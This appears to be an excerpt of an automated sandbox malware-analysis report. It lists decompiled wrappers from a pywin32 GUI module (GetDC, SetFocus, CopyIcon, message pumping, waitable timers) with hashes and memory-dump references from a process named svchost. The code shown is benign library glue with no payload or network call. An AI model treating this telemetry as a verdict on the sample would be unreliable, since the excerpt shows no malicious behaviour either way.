                            • Instruction Fuzzy Hash: 1A0196755083029FDF009F28AC8977A3BB8FF81201F488538FD55C0121E736856BDA97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0DE0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB0DE0(intOrPtr _a8) {
				struct HWND__* _v4;
				long _v8;
				long* _t5;
				struct HWND__** _t6;
				long _t8;
				void* _t9;
				long _t10;
				void* _t13;

				_t5 =  &_v8;
				_v8 = 0;
				__imp__PyArg_ParseTuple(_a8, "O:GetDC", _t5);
				if(_t5 != 0) {
					_t6 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
					if(_t6 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t9, _t13);
						SetLastError(0);
						_t8 = GetDC(_v4);
						_t10 = _t8;
						__imp__PyEval_RestoreThread(_t6);
						if(_t10 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
							return _t8;
						} else {
							_t8 = GetLastError();
							if(_t8 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetDC", _t8);
								return _t8;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                            0x6dab0de3
                            0x6dab0de6
                            0x6dab0df7
                            0x6dab0e02
                            0x6dab0e0a
                            0x6dab0e13
                            0x6dab0e1e
                            0x00000000
                            0x6dab0e20
                            0x6dab0e22
                            0x6dab0e2c
                            0x6dab0e36
                            0x6dab0e3d
                            0x6dab0e3f
                            0x6dab0e4a
                            0x6dab0e6b
                            0x6dab0e6c
                            0x6dab0e7a
                            0x6dab0e4c
                            0x6dab0e4c
                            0x6dab0e54
                            0x00000000
                            0x6dab0e56
                            0x6dab0e5c
                            0x6dab0e6a
                            0x6dab0e6a
                            0x6dab0e54
                            0x6dab0e4a
                            0x6dab0e04
                            0x6dab0e04
                            0x6dab0e09
                            0x6dab0e09

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetDC), ref: 6DAB0DF7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB0E13
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0E22
                            • SetLastError.KERNEL32(00000000), ref: 6DAB0E2C
                            • GetDC.USER32(?), ref: 6DAB0E36
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0E3F
                            • GetLastError.KERNEL32 ref: 6DAB0E4C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetDC,00000000), ref: 6DAB0E5C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_
                            • String ID: GetDC$O:GetDC
                            • API String ID: 3963458015-3846432568
                            • Opcode ID: 4b17f8ae5273f3649a7014ea97562ec49309900bf2176953dcd8ba75674089f1
                            • Instruction ID: 4307345975578a29a3e34e85fd28a2b0a2565a8d2ae3eb1987362ccb61ce2b25
                            • Opcode Fuzzy Hash: 4b17f8ae5273f3649a7014ea97562ec49309900bf2176953dcd8ba75674089f1
                            • Instruction Fuzzy Hash: CD01B175508201AFDF006B69AD8976B3BBCEF82252F488534F845C0121F735896BCAA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB5D00, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB5D00(intOrPtr _a8) {
				struct HDC__* _v4;
				long _v8;
				long* _t5;
				struct HDC__** _t6;
				long _t8;
				void* _t9;
				long _t10;
				void* _t13;

				_t5 =  &_v8;
				_v8 = 0;
				__imp__PyArg_ParseTuple(_a8, "O:WindowFromDC", _t5);
				if(_t5 != 0) {
					_t6 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
					if(_t6 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t9, _t13);
						SetLastError(0);
						_t8 = WindowFromDC(_v4);
						_t10 = _t8;
						__imp__PyEval_RestoreThread(_t6);
						if(_t10 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
							return _t8;
						} else {
							_t8 = GetLastError();
							if(_t8 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WindowFromDC", _t8);
								return _t8;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                            0x6dab5d03
                            0x6dab5d06
                            0x6dab5d17
                            0x6dab5d22
                            0x6dab5d2a
                            0x6dab5d33
                            0x6dab5d3e
                            0x00000000
                            0x6dab5d40
                            0x6dab5d42
                            0x6dab5d4c
                            0x6dab5d56
                            0x6dab5d5d
                            0x6dab5d5f
                            0x6dab5d6a
                            0x6dab5d8b
                            0x6dab5d8c
                            0x6dab5d9a
                            0x6dab5d6c
                            0x6dab5d6c
                            0x6dab5d74
                            0x00000000
                            0x6dab5d76
                            0x6dab5d7c
                            0x6dab5d8a
                            0x6dab5d8a
                            0x6dab5d74
                            0x6dab5d6a
                            0x6dab5d24
                            0x6dab5d24
                            0x6dab5d29
                            0x6dab5d29

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:WindowFromDC), ref: 6DAB5D17
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5D33
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB5D42
                            • SetLastError.KERNEL32(00000000), ref: 6DAB5D4C
                            • WindowFromDC.USER32(?), ref: 6DAB5D56
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB5D5F
                            • GetLastError.KERNEL32 ref: 6DAB5D6C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WindowFromDC,00000000), ref: 6DAB5D7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@FromObject_ParseRestoreSaveTupleWin_Window
                            • String ID: O:WindowFromDC$WindowFromDC
                            • API String ID: 436854260-2255382291
                            • Opcode ID: 69ade1053f9fff412c4cb7c7e4166ed9199b0a2b3063e9e87f8fedf8b26c5a44
                            • Instruction ID: 4bf93b1dbb9a16eb53e57997938b2f3006ebd7dbaec00f8495cd2da46879c6e1
                            • Opcode Fuzzy Hash: 69ade1053f9fff412c4cb7c7e4166ed9199b0a2b3063e9e87f8fedf8b26c5a44
                            • Instruction Fuzzy Hash: B00152355082015FDF006B65EC8D7BA3BBCEF85612F488638F955C1121E736856BDAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0880, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB0880(intOrPtr _a8) {
				struct HWND__* _v4;
				long _v8;
				long* _t5;
				struct HWND__** _t6;
				long _t8;
				void* _t9;
				long _t10;
				void* _t13;

				_t5 =  &_v8;
				_v8 = 0;
				__imp__PyArg_ParseTuple(_a8, "O:SetFocus", _t5);
				if(_t5 != 0) {
					_t6 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
					if(_t6 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t9, _t13);
						SetLastError(0);
						_t8 = SetFocus(_v4);
						_t10 = _t8;
						__imp__PyEval_RestoreThread(_t6);
						if(_t10 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
							return _t8;
						} else {
							_t8 = GetLastError();
							if(_t8 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("SetFocus", _t8);
								return _t8;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                            0x6dab0883
                            0x6dab0886
                            0x6dab0897
                            0x6dab08a2
                            0x6dab08aa
                            0x6dab08b3
                            0x6dab08be
                            0x00000000
                            0x6dab08c0
                            0x6dab08c2
                            0x6dab08cc
                            0x6dab08d6
                            0x6dab08dd
                            0x6dab08df
                            0x6dab08ea
                            0x6dab090b
                            0x6dab090c
                            0x6dab091a
                            0x6dab08ec
                            0x6dab08ec
                            0x6dab08f4
                            0x00000000
                            0x6dab08f6
                            0x6dab08fc
                            0x6dab090a
                            0x6dab090a
                            0x6dab08f4
                            0x6dab08ea
                            0x6dab08a4
                            0x6dab08a4
                            0x6dab08a9
                            0x6dab08a9

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:SetFocus), ref: 6DAB0897
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB08B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB08C2
                            • SetLastError.KERNEL32(00000000), ref: 6DAB08CC
                            • SetFocus.USER32(?), ref: 6DAB08D6
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB08DF
                            • GetLastError.KERNEL32 ref: 6DAB08EC
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetFocus,00000000), ref: 6DAB08FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@FocusObject_ParseRestoreSaveTupleWin_
                            • String ID: O:SetFocus$SetFocus
                            • API String ID: 2080544845-383749740
                            • Opcode ID: 84a1a7cb63105060904f05d275b5746c56363869c2cc1655cec76ddfa0a9d2fa
                            • Instruction ID: 2bab7cdbcea4942f4ef3223e084d3f1d4dfb10f9ddc049be820c7d5942f95759
                            • Opcode Fuzzy Hash: 84a1a7cb63105060904f05d275b5746c56363869c2cc1655cec76ddfa0a9d2fa
                            • Instruction Fuzzy Hash: C20192355082019FDF006B65AD8976A3AB8FF82212F484534F945C0121F735856BDAA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAE820, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAAE820(intOrPtr _a8) {
				struct HICON__* _v4;
				long _v8;
				long* _t5;
				struct HICON__** _t6;
				long _t8;
				void* _t9;
				long _t10;
				void* _t13;

				_t5 =  &_v8;
				_v8 = 0;
				__imp__PyArg_ParseTuple(_a8, "O:CopyIcon", _t5);
				if(_t5 != 0) {
					_t6 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
					if(_t6 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t9, _t13);
						SetLastError(0);
						_t8 = CopyIcon(_v4);
						_t10 = _t8;
						__imp__PyEval_RestoreThread(_t6);
						if(_t10 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
							return _t8;
						} else {
							_t8 = GetLastError();
							if(_t8 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CopyIcon", _t8);
								return _t8;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                            0x6daae823
                            0x6daae826
                            0x6daae837
                            0x6daae842
                            0x6daae84a
                            0x6daae853
                            0x6daae85e
                            0x00000000
                            0x6daae860
                            0x6daae862
                            0x6daae86c
                            0x6daae876
                            0x6daae87d
                            0x6daae87f
                            0x6daae88a
                            0x6daae8ab
                            0x6daae8ac
                            0x6daae8ba
                            0x6daae88c
                            0x6daae88c
                            0x6daae894
                            0x00000000
                            0x6daae896
                            0x6daae89c
                            0x6daae8aa
                            0x6daae8aa
                            0x6daae894
                            0x6daae88a
                            0x6daae844
                            0x6daae844
                            0x6daae849
                            0x6daae849

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CopyIcon), ref: 6DAAE837
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE853
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE862
                            • SetLastError.KERNEL32(00000000), ref: 6DAAE86C
                            • CopyIcon.USER32 ref: 6DAAE876
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE87F
                            • GetLastError.KERNEL32 ref: 6DAAE88C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CopyIcon,00000000), ref: 6DAAE89C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_CopyError@@IconObject_ParseRestoreSaveTupleWin_
                            • String ID: CopyIcon$O:CopyIcon
                            • API String ID: 2495843093-3298496335
                            • Opcode ID: 4872673fd21b436247dbc0d716b9912d8380bcf9718f3681f24928d056f9837b
                            • Instruction ID: f4bd78f7d442d15c8998a6ff9e6e73ff8bfa90884decaf189201c25e738d338e
                            • Opcode Fuzzy Hash: 4872673fd21b436247dbc0d716b9912d8380bcf9718f3681f24928d056f9837b
                            • Instruction Fuzzy Hash: A9019235508201AFDF006B24ED8977A3AB8FF85216F4C4634F955C1121F735856BCAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1020, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 52threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB1020(intOrPtr _a8) {
				struct HDC__* _v4;
				long _v8;
				long* _t5;
				struct HDC__** _t6;
				long _t8;
				void* _t9;
				long _t10;
				void* _t13;

				_t5 =  &_v8;
				_v8 = 0;
				__imp__PyArg_ParseTuple(_a8, "O:CreateCompatibleDC", _t5);
				if(_t5 != 0) {
					_t6 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v8, _t6);
					if(_t6 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t9, _t13);
						SetLastError(0);
						_t8 = CreateCompatibleDC(_v4);
						_t10 = _t8;
						__imp__PyEval_RestoreThread(_t6);
						if(_t10 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t10);
							return _t8;
						} else {
							_t8 = GetLastError();
							if(_t8 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateCompatibleDC", _t8);
								return _t8;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                            0x6dab1023
                            0x6dab1026
                            0x6dab1037
                            0x6dab1042
                            0x6dab104a
                            0x6dab1053
                            0x6dab105e
                            0x00000000
                            0x6dab1060
                            0x6dab1062
                            0x6dab106c
                            0x6dab1076
                            0x6dab107d
                            0x6dab107f
                            0x6dab108a
                            0x6dab10ab
                            0x6dab10ac
                            0x6dab10ba
                            0x6dab108c
                            0x6dab108c
                            0x6dab1094
                            0x00000000
                            0x6dab1096
                            0x6dab109c
                            0x6dab10aa
                            0x6dab10aa
                            0x6dab1094
                            0x6dab108a
                            0x6dab1044
                            0x6dab1044
                            0x6dab1049
                            0x6dab1049

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CreateCompatibleDC), ref: 6DAB1037
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB1053
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1062
                            • SetLastError.KERNEL32(00000000), ref: 6DAB106C
                            • CreateCompatibleDC.GDI32(?), ref: 6DAB1076
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB107F
                            • GetLastError.KERNEL32 ref: 6DAB108C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateCompatibleDC,00000000), ref: 6DAB109C
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_CompatibleCreateError@@Object_ParseRestoreSaveTupleWin_
                            • String ID: CreateCompatibleDC$O:CreateCompatibleDC
                            • API String ID: 1954511142-1011343557
                            • Opcode ID: 53a4356e5a724d4faa0830da9bec380bbc8c37f24e061d14fc38c44a7ce87a38
                            • Instruction ID: 3644c8246d68e65e1dc36a27071a4b63a2127ec7bcbb3283f8bd0e574ea0593e
                            • Opcode Fuzzy Hash: 53a4356e5a724d4faa0830da9bec380bbc8c37f24e061d14fc38c44a7ce87a38
                            • Instruction Fuzzy Hash: 5D0175355082019FDF006B29ED9977B3BBCEF81216F488534FD95C1121E735856BDAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAE990, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiOiiiOi:DrawIconEx,?,?,?,?,?,?,?,?), ref: 6DAAE9E0
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEA01
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEA13
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEA25
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: DrawIconEx$OiiOiiiOi:DrawIconEx
                            • API String ID: 1248562531-2438314532
                            • Opcode ID: d36470dc8a0c045055dbefe9a738c8eaf935e12effc00f321f3e1e994ce2b10a
                            • Instruction ID: 3007275be352a310cca9f975a06f7d54b32528f702d64a5f5e756716193e49e3
                            • Opcode Fuzzy Hash: d36470dc8a0c045055dbefe9a738c8eaf935e12effc00f321f3e1e994ce2b10a
                            • Instruction Fuzzy Hash: 1E314F7641C305AFDB01DF54CC40EABBBFDBF88205F448A2AF994D2120E731DA199B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB3940, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 77COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiOO:SetMenuItemBitmaps,?,?,?,?), ref: 6DAB397C
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB399D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB39AF
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB39C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OiiOO:SetMenuItemBitmaps$SetMenuItemBitmaps
                            • API String ID: 1248562531-3607371556
                            • Opcode ID: 283a25c9e6106d4dacd411a2ea89acf4d74fc59d199b3b9d2c70dc6a685143f4
                            • Instruction ID: 0d7bd1dfb107af837f0b0ff067f8e4eb60d5fedc2314c6ea8ae5f6491c483b2e
                            • Opcode Fuzzy Hash: 283a25c9e6106d4dacd411a2ea89acf4d74fc59d199b3b9d2c70dc6a685143f4
                            • Instruction Fuzzy Hash: 04215176408305AFDB01DF55CC85BABBBFCBF88205F484929F99491120E331D95A9BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA8940, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 76windowthreadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 44%
                            			E6DAA8940(intOrPtr _a8) {
				struct tagMSG _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				int* _t19;
				int _t21;
				struct HWND__* _t22;
				void* _t36;
				struct HWND__* _t37;

				_v36 = 0;
				_t19 =  &_v36;
				_v40 = 0;
				__imp__PyArg_ParseTuple(_a8, "|ii:PumpWaitingMessages", _t19,  &_v40);
				if(_t19 != 0) {
					_t37 = 0;
					__imp__PyEval_SaveThread(_t36);
					_v32 = _t19;
					_t21 = PeekMessageW( &_v28, 0, _v36, _v40, 1);
					if(_t21 != 0) {
						while(_v28.message != 0x12) {
							_t22 =  *0x6dac7cd8; // 0x0
							if(_t22 == 0 || IsDialogMessageW(_t22,  &_v28) == 0) {
								TranslateMessage( &_v28);
								DispatchMessageW( &_v28);
							}
							_t21 = PeekMessageW( &_v28, 0, _v36, _v40, 1);
							if(_t21 != 0) {
								continue;
							} else {
							}
							L11:
							goto L12;
						}
						_t21 = _v28.wParam;
						_t37 =  !=  ? _t21 : 1;
						goto L11;
					}
					L12:
					__imp__PyEval_RestoreThread(_v32);
					__imp__?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z(_t37);
					return _t21;
				} else {
					return _t19;
				}
			}












                            0x6daa8946
                            0x6daa894f
                            0x6daa8953
                            0x6daa8965
                            0x6daa8970
                            0x6daa8977
                            0x6daa8979
                            0x6daa8985
                            0x6daa8993
                            0x6daa899b
                            0x6daa89b2
                            0x6daa89b9
                            0x6daa89c0
                            0x6daa89d3
                            0x6daa89da
                            0x6daa89da
                            0x6daa89ed
                            0x6daa89f5
                            0x00000000
                            0x00000000
                            0x6daa89f7
                            0x6daa8a07
                            0x00000000
                            0x6daa8a09
                            0x6daa89f9
                            0x6daa8a04
                            0x00000000
                            0x6daa8a04
                            0x6daa8a0a
                            0x6daa8a0e
                            0x6daa8a15
                            0x6daa8a22
                            0x6daa8975
                            0x6daa8975
                            0x6daa8975

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,|ii:PumpWaitingMessages,?), ref: 6DAA8965
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8979
                            • PeekMessageW.USER32 ref: 6DAA8993
                            • IsDialogMessageW.USER32 ref: 6DAA89C8
                            • TranslateMessage.USER32(?), ref: 6DAA89D3
                            • DispatchMessageW.USER32 ref: 6DAA89DA
                            • PeekMessageW.USER32 ref: 6DAA89ED
                            • PyEval_RestoreThread.PYTHON38(?), ref: 6DAA8A0E
                            • ?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z.PYWINTYPES38(00000000), ref: 6DAA8A15
                            Strings
                            • |ii:PumpWaitingMessages, xrefs: 6DAA895C
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Message$Eval_PeekThread$Arg_DialogDispatchFromLong_ParsePtr@@RestoreSaveTranslateTupleU_object@@Void
                            • String ID: |ii:PumpWaitingMessages
                            • API String ID: 65304543-283788920
                            • Opcode ID: 93a439c5f78cf3b41825425a5a1c6f83b4fd9ecc47175a679dc946780a1b8826
                            • Instruction ID: 7a4b79b2660d2ecc115017f9a89619d69c66f8266ed2d3e919ff9d65c88b1bc9
                            • Opcode Fuzzy Hash: 93a439c5f78cf3b41825425a5a1c6f83b4fd9ecc47175a679dc946780a1b8826
                            • Instruction Fuzzy Hash: E5216B71508306AFDB00DF65CC84B5BBBF8FF89344F448A19F54593120E731D9468B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91FF0, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 72timeCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOlOOi:SetWaitableTimer,?,?,?,?,?,?,?), ref: 6DA92039
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA9204F
                            • ?PyWinObject_AsLARGE_INTEGER@@YAHPAU_object@@PAT_LARGE_INTEGER@@@Z.PYWINTYPES38(?,?), ref: 6DA92065
                            • PyErr_SetString.PYTHON38(6E28ED8C,This param must be None), ref: 6DA92089
                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,?), ref: 6DA920BA
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWaitableTimer,00000000), ref: 6DA920CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Object_$Arg_Err_Error@@ParseR@@@StringTimerTupleWaitableWin_
                            • String ID: OOlOOi:SetWaitableTimer$SetWaitableTimer$This param must be None$This param must be None
                            • API String ID: 2028803193-3419485231
                            • Opcode ID: 304058409bd8efd9c0d9bcb3713a38c49b267b07b915a7f07df467f09f9f7808
